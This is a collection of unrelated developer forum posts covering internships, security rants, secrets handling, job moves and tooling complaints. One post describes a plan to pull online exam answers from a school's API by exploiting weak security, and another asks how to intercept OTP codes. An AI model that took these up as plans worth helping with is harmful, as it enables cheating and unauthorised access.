PS it is my first day of my internship i went to the campus it was so prettty as i havent see anything pretty as this office campus so i clicked the picture standing next to the company logo the watchmen clicked it for me as i was too early to the campus there were no on, i was smiling like a dumb person that security guy was happy after knowing my story then i posted it on my IG and snapchat then i went it wait for onboarding stuff and then i got to meet my HR and she discussed everything she was sweet enough to explain me everything in detail too friends staff then when i checked my phone when the day was completed from office

guess what all those people who used to mock me and my friend for being nerds and used to mock me because of my financial bg now they were congratulating me and asking me how i got this and all
so i just want you to know please don't judge anyone or bully anyone just because of their bg they are always suffering in dark i will like to thank my close friend which was always with me

ty guys for reading till end

One of our senior colleagues in my last project at TCS had brought a pen drive with him, not sure why! He worked on a client system, which he believed was not monitored by TCS. So what he did was, he plugged in the pen drive in his computer and tried to copy some files from his pen drive to the computer. However, he wasn’t able to copy the files.

We weren’t aware of this until our project manager, who sits at the farthest end of the ODC shouted at the top of his voice, calling out his name. In front of the entire ODC, he was scolded since the HR team had called the manager informing that the machine assigned under this employee’s name has detected a security breach.

He had to explain the reason; where he said he wanted to copy some codes that he had to office machine in order to reduce his manual effort, which was probably very silly of him! For the next few days I hardly saw him inside the ODC, probably had to visit people to show cause or other things and was harrassed by our manager, insulted every time he passed by him.

He was not suspended although, maybe the manager or someone else saved him, although normally such violations would have seen him terminated.

The platform team who provides all other teams with common framework emails everybody we need to upgrade the framework to new version. Let’s say version 1.a.0. They say it brings crucial security features and all pipelines using old versions would be blocked. My colleague created a story to upgrade all of our 10 microservices. When I got to it in a couple of days for some fucking reason they already rolled out 1.a.1 and didn’t inform anybody, the pipelines just logged warning u need to use 1.a.1. Alright, I did the upgrade to 1.a.1 and merged ducking everything in 10 fucking microservices. In a couple of days at morning they roll our 1.a.2 and require everybody to upgrade ducking degenerates as they found a high severity bug. I wanted to start again but was lazy and did nothing all day to learn that at 6pm the fuckers roll out 1.a.3!!! And again require everyone to upgrade!1!1!1eleven
Ten fuxkibg microservices. Goddamit write some unit tests, do friends&family, do fucking tests on small group of your inner clients before rolling out this shit that everybody must to use.
Spat at the display

I wonder if crypto exchanges are so damn vulnerable or just so transparent.

I mean, it is impossible to scroll tech articles for more than a few seconds before stumbling on a report of yet another crypto exchange being nicked a couple hundred mil USD.

- It could be that their security severely sucks (wouldn't blame them for it, most businesses do suck at securing shit).
- It could be that the entire black hat community is putting it's might on stealing money that is so fucking easy to launder.
- It could be that is damn nigh impossible to cover up a crypto hack since the evidence of coins drifting away is forever on display in the public ledger, and in that case crypto companies are not hacked more often than regular companies, they are just much more often publically shamed for it.
- It could be a mix of all the above, but my intuition is that one factor is more relevant.

Which would be the most relevant factor? One of the above or yet another attack vector to the stupidest value conduit ever?

I decided to use Docker Compose on a tiny project that essentially consists of an API and a Caddy server that serves static files and proxies to the API, all of this running on an EC2 t1-nano. I made this admittedly odd choice because I wanted to learn Compose and simultaneously forego figuring out why the node-gyp bindings for sqlite3 refuse to build on EC2 even though it builds just fine on my machine.

I am storing secrets in .env which is committed into the private GH repo. Just now I came across a rant that described the same security practice and it sounded pretty bad from an outside perspective so I decided to research alternatives.

Apparently professional methods for storing secrets generally have higher system requirements than a t1-nano. I'm not looking for a complex service orchestration system, I'm not trying to run an enterprise on this poor little cloud-based raspberry pi. I just want to move my secrets out of the Git repo,

Any tips?

Lately as I've been reading about hacks in companies like Uber, Rockstar etc. I've come to remember my time at a company that worked like a feature factory, where developers constantly groaned about not having enough time to do things right. This had lead to having a few dozen people (both business and technology side) with direct access to the production database, just so they can do their jobs and that database was replicated across various environments just so they could develop on top of it, and do "proper testing".

The bad side is, this database contained the personal information of millions of the people (names, addresses, ssn numbers..). I saw this security problem, and always spoke out about it, but there was never enough time to do anything about it, like build the features the users need for them to do their job without direct access to the database. The app itself was a monolithic nightmare with poor development standards and holes here and there.

It only takes one person whos credentials could be compromised to bring that entire business down because all the data resides in one single database. However, they are lucky that there were at least smart people in the Ops department so they do have some good security measures in place on that side, because the development side was complete shit. Don't go lacking around with security!

Not sure how to ask this. I really enjoy Network side of IT. Maybe even throw in a little Cyber Security as well. I feel like I'm trying to every too fast. I got no certifications yet. This is stressful 😫

What did I do while down for the count with Covid?

* Setup a static React site
* Hosted the site at Cloudflare Pages
* Protected the page through CF access
* Extracted the JWT
* Setup a Rails API to validate the token

Now I have static React UIs with a nice rich API backend.

Wtf is going on at Patreon? Heard they fired their entire security staff a could days ago

Security experts have discovered hundreds of fake websites which are being used to spread dangerous malware for Android and Windows devices. A "vast" network of over 200 internet pages, which impersonate 27 brands such as household names like TikTok, PayPal and Snapchat, are being used to spread a vicious bug which can empty out bank accounts. These bogus websites feature the notorious ERMAC banking trojan which is capable of stealing sensitive login details for 467 online banking and cryptocurrency apps.

A question to all software security specialists of devRant. Please, take it serious.

Is it fundamentally possible to restrict a SQL database like Postgres in a way that unintended SQL queries are impossible to execute? Perhaps in some kind of whitelist fashion. Is it possible to achieve the kind of security that will be just fine exposed to the outside world akin to "SQL queries in onClick handlers" scenario?

Or is this an uphill battle of never being able to moderate an infinite set of possible fraudulent queries?

So, I've been with my current employer four years now, three and a half of which have been spent working as a time material developer for a huge fashion company. I've been trying to get out of It for the past six months only for my exit to be postponed everytime. There's also no clear idea as to what I would be moved to, going forward. Nobody Is telling me a thing and I think other developers will be moved to different projects before I do.

That's why I took matters into my own hands and started getting back into the recruitement process. I'm about to receive an offer. A fairly better one.

The thing is, I wanna use such offer to see if my current employer can reedem himself and propose to me a good counter offer. I'm not in the mood of starting over, but I want security and management to have a fucking idea of what my future Is gonna be like at this fucking company.

What do you guys think? Am I playing with Fire?

Due to my company's microsoft AD team being amateurs, I have to MFA on my work-issued computer at least 4-6 times a day, for each individual work system I access.

Today I had to reset my password. It's double-prompts for me today 😂

You can make your software as good as you want, if its core functionality has one major flaw that cripples its usefulness, users will switch to an alternative.

For example, an imaginary file manager that is otherwise the best in the world becomes far less useful if it imposes an arbitrary fifty-character limit for naming files and folders.

If you developed a file manager better than ES File Explorer was in the golden age of smartphones (before Google excercised their so-called "iron grip" on Android OS by crippling storage access, presumably for some unknown economic incentive such as selling cloud storage, and before ES File Explorer became adware), and if your file manager had all the useful functionality like range selection and tabbed browsing and navigation history, but it limits file names to 50 characters even though the file system supports far longer names, the user will have to rely on a different application for the sole purpose of giving files longer names, since renaming, as a file action, is one of the few core features of a file management software.

Why do I mention a 50-character limit? The pre-installed "My Files" app by Samsung actually did once have a fifty-character limit for renaming files and folders. When entering a longer name, it would show the message "up to 50 characters available". My thought: "Yeah, thank you for being so damn useful (sarcasm). I already use you reluctantly because Google locked out superior third-party file managers likely for some stupid economic incentives, and now you make managing files even more of a headache than it already is, by imposing this pointless limitation on file names' length."

Some one at Samsung's developer department had a brain fart some day that it would be a smart idea to impose an arbitrary limit on file name lengths. It isn't.

The user needs to move files to a directory accessible to a superior third-party file manager just to give it a name longer than fifty characters. Even file management on desktop computers two decades ago was better than this crap!

All of this because Google apparently wants us to pay them instead of SanDisk or some other memory card vendor. This again shows that one only truly owns a device if one has root access. Then these crippling restrictions that were made "for security reasons" (which, in case it isn't clear, is an obvious pretext) can be defeated for selected apps.

I had a little question about recruitment:
What would make you consider a position with a relocation package? What kind of arrangement/security would you like?

I’m side-eyeing my apartment building’s management for emailing me a non-password-protected document that includes my Social Security number. 🤨

A philosophical question about maintenance/updating.

There is no need to repeat the reasons we need to update our dependencies and our code. We know them/ especially regarding the security issues.
The real question is , "is that indicates a failure of automation"?

When i started thinking about code, and when also was a kid and saw all these sci fi universes with robots etc, the obvious thing was that you build an automation to do the job without having to work with it anymore. There is no meaning on automate something that need constant work above it.

When you have a car, you usually do not upgrade it all the time, you do some things of maintance (oil, tires) but it keeps your work on it in a logical amount.
A better example is the abacus, a calculating device which you know it works as it works.

A promise of functional programming is that because you are based on algebraic principles you do not have to worry so much about your code, you know it will doing the logical thing it supposed to do.
Unix philosophy made software that has been "updated" so little compared to all these modern apps.
Coding, because of its changeable nature is the first victim of the humans nature unsatisfying.

Modern software industry has so much of techniques and principles (solid, liquid, patterns, testing that that the air is air) and still needs so many developers to work on a project.
I know that you will blame the market needs (you cannot understand the need from the start, you have to do it agile) but i think that this is also a part of a problem .
Old devices evolved at much more slow pace. Radio was radio, and still a radio do its basic functionality the same war (the upgrades were only some memory functionalities like save your beloved frequencies and screen messages).

Although all answers are valid, i still feel, that we have failed. We have failed so much. The dream of being a programmer is to build something, bring you money or satisfaction, and you are bored so you build something completely new.

Is it really good OpSec to log me out of outlook every hour when the password manager lets me automatically log back in?

What if the earth was a prison, and we are all prisoners at a maximum security prison serving our sentences virtually? Honestly, if this is the case I won't be surprised.

Mongodb CEO and the developer who build this shit for brains interface should be tarred and feathered. Almost 90minutes in and I cannot connect to anything other than error codes. What in the actual fuck is your job other than to make it difficult for a "free tier" user to connect?
"connect ECONNREFUSED 127.0.0.1:27017"

Oh ok another 20 minutes of work and you give me a bland beige error code like "```TLS/SSL is disabled. If possible, enable TLS/SSL to avoid security vulnerabilities.```"... um ok how do I enable it for your site, your database or on my computer... oh wait you don't say shit do you?

So now I'm fully 81 minutes into this shit show and all I get for error codes are these really descriptive gems 'getaddrinfo ENOTFOUND cluster0.hudbd.mongodb 'dot' net` comes up if I choose `mongo` with "connection string scheme" above it or `bad auth : Authentication failed'

I have the following scenario with a proposed solution, can anyone please confirm it is a secure choice:
- We have critical API keys that we do not want to ship with the app because de-compiling will give access to those keys, and the request is done before the user logs in, we are dealing with guests

Solution:
- Add a Lambda function which accepts requests from the app and returns the API keys
- Lambda will accept the following:
1. Android app signing key sha1
2. iOS signing certificate sha1
- If lambda was able to validate them API keys are sent back.

My concerns:
- Can an attacker read the request from the original (non-tampered) apk and see what the actual sha1 value is on his local network?
- If the answer to the question above is yes, what is the recommended way to validate that the request received is actually from the app that we shipped and not from curl/postman/script/modified version of the app

Anyone here work as SOC Analyst or security engineer 🤔 ?!

i once changed all of the passwords of my main online accounts(google, apple, facebook, telegram, outlook) as they weren't changed for years.

i decided unique and long passwords for each of them.😎

immediately after changing the passwords, i forgot all of them. 😵fortunately, i was able to reset.
Has this ever happened to anyone?

For a project I'm working on:

Does your work allow you to sign in to your personal accounts for i.e. Gmail or Facebook on your work device?
Do you think this should be allowed?
Do you do it yourself?

I imagine it's a gray area. I'm even thinking it could be a security risk? But maybe healthier too to keep business and private life separate? Thoughts?

I’m in a tough spot - I’m completely overloaded with sysadmin type work (server upgrades, firewall and vendor coordination, security, password maintenance) that I don’t have time to complete any programming work assigned to me. My bosses are aware and have done their best to help, but I just can’t keep up (have two young kids too and just can’t work nights anymore without trouble at home). My bosses have been great, so I feel terrible about this, but I think I’m going to have to look for another employer, I can’t do this anymore. Am I a horrible person to leave them with so much work even though they tried to help me?

Checking for root is maintaining a false façade of security. By the definition of root it can always be bypassed and we should be designing workflows to discourage logging in from an untrusted device unless you have 2fa.

Every single time that I realised how much of my expertise sounds like vaporware to people, mostly management and C-level.

Have been working on security for quite some time now but seeing that I can't really get through make me feel useless and not worth my weight in shit.

Is it possible to add a layer of security such as a password when you use Thunderbird Mail application? So when you open it, it would require a password to proceed checking mails etc..

A few years ago we had a fail-over which was successful until we started failing everything back to primary servers. The applications could not start at all.
4 hours into troubleshooting, only to find out some java security files were misbehaving. Update from another server and it worked.
Up to date i haven't understood how it failed

Classiflying hack tools as virus on windows defender or whatever puts in risk users that want to hack some device but have to disable user defender to use them (and could potentially download malicious software bundled together or inside the hack tool)

all their petty torturous crap does is get them beaten and killed jn the long run. meanwhile their 'security' system keeps them trapped. hurray.

Simple. Get that fucking project I’ve been on and off working on (mostly) by myself for the last year and a half or so into production so that I can begin the transition to my new role… where I get to be a major pain in the arse for all our devs with my security pitchfork. Mwahaha!

the red haired girl and the blue haired girl.

there was this story about a programmer who spent years studying computer science before finally getting a job.

the dev studied only computer science and was put on blue team after a few days.

a few hours into one of the constant coding sessions, the boss told the devs that red team members and blue team members would be working in pairs.

the person from red team transferred the devs work to their data base without the dev knowing, then locked down the devs computer. the dev could not do anything. later, the dev got fired for not doing any work. after that, the company got millions of dollars, and the dev did not see any of it.

both the dev and the managers made a note not to hire any programmer who cannot secure their work.

it is not ethical to teach people programming without also teaching them cyber security.

computer networking, programming and security should all be the same major.

it is a bad idea to teach people how to build anything without telling them how to secure it.

the story above was just a scenario, but it probably happens way more often than people think.

Schools should teach both things in the same major.

Guys, is it possible to catch OTP code sent from a website to phone through the browser just because of a lack of security practice and weak coded script?

i am so fucking conflicted right now. seeing my fiture getting ruined in front of my present eyes. Life always gives me a chance to jump out of a ship that's about to fucking blow , i took it the first time, but this time i missed it for bravery ( and stupidity), and now am sinking alongside this fucking ship

my first job was amazing. decent work, sometimes a lot and sometimes too less. i would learn new things ,interact with people, handle a lot of fuckups . at one point i felt like looking for another opportunity , got one giving 50% hike , so i jumped the ship and sent a resignation letter. the noitice peripd was less, so i enjoyed my days applying to other ships. got even a better offer with 100% hike, so from one boat to another to now a literal cruise.

later i got to know that my original company got bankrupt and fired 85% staff. the next month the company that gave me the first offer layed off 30% staff.

now the waters are tough and my cruise is also getting impacted. but instead of firing, they are asking us to come to the office permanently. their office is in a fucked up place: you need 8$ just to breath the fucking air there. its the city of blood and money. and you will be giving away both things there.

my brain got split into 2 parts after this announcement: my stupid self was still considering this while my sensible self started applying for jobs. my stupid self was thinking that this is a great opportunity to leave my fucking nest of a home , where i am liv8ng woth my parents for last 25 years, and learn to live alone. clean utensils, cook food , wash clothes... i wanted to live the life the harsh way.

but life still took a pity on the fool that j am and gave me an opportunity. an opportunity to work with a big brand who hasn't done any layoffs in their 40+ yrs of existence (but also known for giving shit increments)
the offer was just a 40% hike but it was near my home. i could be in office in 1 hr in less than a dollar a day and still earn more than what am earning now.

plus my notice period is now 60 days , so who knows what other offer i could have got in those 60 days ( when i would keep my profile with a big green "immediately available to hire" circle on me.

however this time i didn't jump the boat. i asked them for a bigger raisez they declined and my stupid self was more than happy.
now the company has started to send mails regarding relocation and yepp the cruise is sinking , atleast for me. if i was savingsx in this company, my savings would become x/8 if i go to that city. in the new offer it would have at worst remained x.

and that's not even half of what's bothering me. i had accepted the money loss in exchange of what that city and my company had to offer : a chance to experience WFO, a chance to live life like a mature man and not a kid in his mom's house ,and a life full of hurdles and strangers.

however i always like to keep an emergency fallback mechanism on me , for if things don't work out. I don't wanna go depressed and cut my wrists there, I don't want people to hurt me so much that I can't recover. i want to run away from that wreched city the moment i start to loose the battles there and the city starts taking over me.

but what the holy fuck? my company's notice period is 60 days, and my rented room's security deposit is 6 fucking months? i will be giving 6 months of deposit + 1 month of brokerage + 1month of rent on the first day i put my steps on that wretched land after travelling in a 100 dollar flight! where am i supposed to get this much money?!
and okay, somehow i manage this. say i did an 11 months agreement, paid the fucking 8 months of rent at one go and simply started living a shitty life there. in month 2 i break down and wanted to implement my escape mechanism. it would go like this : i will suck up and try to live for rent free for next 6 months. but wait, THAT'S NOT FUCKING ALLOWED!! iam supposed to get my security AFTER 11+1 MONTHS!! why not freaking adjust it in my rent?

I can't think straight . 6 months of security deposit has blown my brain. i am regretting anything and everything. I can't think of my roommates situation, home safety, room location, whatever the fucks we think while looking for a room . all i can think is ...WHY SO MUCH MONEY NEEDS TO GO AT ONCE!?

FUCK

I love how shitty looking VPN software is used in my company. How can I trust in you providing me security if you can't fucking provide correctly rendered icons?

Last year I did a statistics course, and my classes were completely remote. When it came down to exam season, instead of studying I learned python's data analysis libraries, I passed with flying colors. I have an idea, if exams continue to be online I will be spending a lot of my time trying to get the answers from whatever API they are using, hopefully, they have poor security. If it's hopeless, I'll just study